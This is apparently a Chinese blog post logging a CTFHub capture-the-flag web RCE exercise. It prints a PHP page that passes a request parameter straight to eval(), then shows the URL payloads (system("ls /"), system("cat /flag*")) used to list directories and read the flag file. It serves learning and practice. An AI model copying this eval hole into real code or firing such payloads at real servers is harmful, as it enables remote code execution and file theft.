CTFHub 技能树 Web RCE eval执行(学习记录)

马船长2024-12-15 17:23

eval执行

源代码

php 复制代码 
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
Slow菜鸟3 小时前
AI学习篇(三) | AI效率工具指南(2026年)
人工智能·学习
qcwl663 小时前
深入理解Linux进程与内存 学习笔记#4
笔记·学习
蒸蒸yyyyzwd4 小时前
后端学习笔记 day4
linux·笔记·学习
笨笨饿5 小时前
20_Git 仓库使用手册 - 初学者指南
c语言·开发语言·嵌入式硬件·mcu·学习
cqbelt6 小时前
Python 并发编程实战学习笔记
笔记·python·学习
智算菩萨6 小时前
【论文复现】Applied Intelligence 2025:Auto-PU正例无标签学习的自动化实现与GPT-5.4辅助编程实战
论文阅读·python·gpt·学习·自动化·复现
老神在在0017 小时前
【Selenium 自动化精讲】浏览器弹窗与登录界面的本质区别 & 实操指南
javascript·学习·selenium·测试工具·自动化
·醉挽清风·7 小时前
学习笔记—Linux—信号阻塞&信号捕捉
linux·笔记·学习
AnalogElectronic8 小时前
uniapp学习5,兼容微信小程序的俄罗斯方块游戏
学习·微信小程序·uni-app
知识分享小能手8 小时前
MongoDB入门学习教程,从入门到精通,MongoDB应用程序设计知识点梳理(9)
数据库·学习·mongodb
热门推荐
012026年3月AI领域大事件:DeepSeek引领开源风暴02GitHub 镜像站点03Qwen3.5-Omni与Qwen3.6模型全面解析(含测评/案例/使用教程)04围棋-html版本05Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services06“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)07纯 HTML/CSS/JS 实现的高颜值登录页,还会眨眼睛!少女心爆棚!08UV安装并设置国内源09让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南10AI 编程效率翻倍:Superpowers Skills 上手清单 + 完整指南